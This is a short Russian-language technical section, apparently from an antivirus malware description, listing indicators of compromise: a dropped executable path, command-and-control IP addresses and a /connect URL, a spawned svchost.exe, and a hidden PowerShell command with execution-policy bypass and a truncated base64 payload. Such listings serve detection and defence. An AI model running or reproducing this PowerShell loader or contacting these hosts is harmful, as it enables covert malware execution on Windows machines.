Техническая информация
- '%TEMP%\fdsajoifjdsojfdsaoffefs.exe'
- http://139.162.154.90/connect
- %WINDIR%\syswow64\svchost.exe
- %TEMP%\fdsajoifjdsojfdsaoffefs.exe
- '45.#9.99.36':80
- '13#.#62.154.90':80
- http://13#.#62.154.90/connect
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -exec bypass -windowstyle hidden -Noninteractive -e DQAKACAAIAAgACAAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBXAGUAYgBjAGwAaQBlAG4AdAAgAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAUABhAHIAYQBtAA0ACgAgACAA...' (со скрытым окном)
- '%WINDIR%\syswow64\svchost.exe' ' (со скрытым окном)
- '%WINDIR%\syswow64\svchost.exe'